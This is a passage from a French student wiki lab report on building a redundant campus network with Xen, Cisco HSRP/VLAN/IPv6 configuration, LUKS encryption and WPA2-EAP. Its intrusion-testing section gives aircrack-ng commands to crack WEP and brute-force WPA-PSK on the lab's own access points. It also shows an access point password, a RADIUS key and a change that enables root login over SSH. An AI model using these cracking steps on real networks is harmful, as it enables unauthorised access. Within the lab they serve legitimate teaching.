 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [3. Install pip] **************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [4. install docker package] ***************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [5. Stop container if running] ************************************************************************************************************************************&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie]&lt;br /&gt;
&lt;br /&gt;
 TASK [delete image] ****************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [6. Build Docker image from Dockerfile] ***************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepisse]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
 changed: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [7. Running the container]  ****************************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-blennoragie]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepisse]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
&lt;br /&gt;
 TASK [8. Check if container is running] ********************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
 changed: [private-blennoragie]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepiss]&lt;br /&gt;
&lt;br /&gt;
 PLAY RECAP *************************************************************************************************************************************************************&lt;br /&gt;
 private-6phil              : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-blennoragie        : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-chaudepisse        : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-chlamydiae         : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-herpesgenital      : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-mycoplasma         : ok=10   changed=3    unreachable=0    failed=0&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52087</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52087"/>
				<updated>2020-01-14T21:52:54Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Playbooks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
